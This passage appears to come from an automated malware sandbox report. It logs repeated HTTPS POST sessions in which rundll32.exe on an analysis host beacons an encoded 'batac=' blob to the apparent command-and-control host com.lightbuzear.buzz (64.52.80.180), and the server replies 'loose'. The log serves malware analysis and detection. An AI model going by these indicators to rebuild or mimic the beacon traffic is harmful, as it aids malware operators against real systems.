              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:22 UTC87INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:21 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:22 UTC87INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              52192.168.2.224922464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:22 UTC87OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:22 UTC87OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:23 UTC88INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:22 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:23 UTC88INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              53192.168.2.224922564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:23 UTC88OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:23 UTC89OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:24 UTC90INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:24 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:24 UTC90INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              54192.168.2.224922664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:24 UTC90OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:24 UTC91OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:25 UTC92INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:25 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:25 UTC92INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              55192.168.2.224922764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:25 UTC92OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:25 UTC92OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:26 UTC93INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:26 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:26 UTC93INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              56192.168.2.224922864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:26 UTC93OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:26 UTC94OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:27 UTC95INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:27 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:27 UTC95INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              57192.168.2.224922964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:27 UTC95OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:27 UTC95OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:28 UTC97INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:28 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:28 UTC97INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              58192.168.2.224923064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:29 UTC97OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:29 UTC97OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:29 UTC98INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:29 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:29 UTC98INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              59192.168.2.224923164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:30 UTC98OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:30 UTC99OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:30 UTC100INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:30 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:30 UTC100INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              6192.168.2.224917864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:32 UTC11OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:32 UTC11OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:32 UTC13INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:32 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:32 UTC13INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              60192.168.2.224923264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:31 UTC100OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:31 UTC100OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:31 UTC101INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:31 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:31 UTC102INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              61192.168.2.224923364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:32 UTC102OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:32 UTC102OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
